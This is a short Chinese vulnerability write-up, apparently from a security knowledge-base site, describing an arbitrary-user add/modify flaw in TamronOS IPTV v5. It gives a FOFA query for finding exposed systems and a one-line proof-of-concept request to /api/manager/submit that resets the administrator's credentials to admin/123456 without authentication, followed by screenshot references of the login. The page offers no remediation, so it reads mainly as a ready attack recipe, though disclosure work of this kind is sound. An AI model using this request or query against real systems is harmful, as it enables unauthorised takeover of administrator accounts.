menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right TamronOS IPTV系统存在任意用户添加修改 chevron_right TamronOS IPTV系统存在任意用户添加修改.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    TamronOS IPTV系统存在任意用户添加修改.md
    707 B / 2021-07-15 20:04:53
        ## TamronOS IPTV系统存在任意用户添加修改

## 漏洞描述

TamronOS IPTV系统存在任意用户添加修改,攻击者可以利用此漏洞新增管理员,或者利用此漏洞重置管理员账户密码。

## 漏洞影响

> TamronOS IPTV v5 3..6.6

## FOFA

> title="TamronOS IPTV系统"

## 复现

1)登录界面

![1](/resource/TamronOS-IPTV系统任意用户添加修改/1.jpg)

2)POC如下,直接修改用户名密码为admin/123456

```
/api/manager/submit?group=1&password=123456&rnd=0.27576036347932775&status=1&username=admin 
```

 ![2](/resource/TamronOS-IPTV系统任意用户添加修改/2.jpg)

3)登录

![3](/resource/TamronOS-IPTV系统任意用户添加修改/3.jpg)
    links
    file_download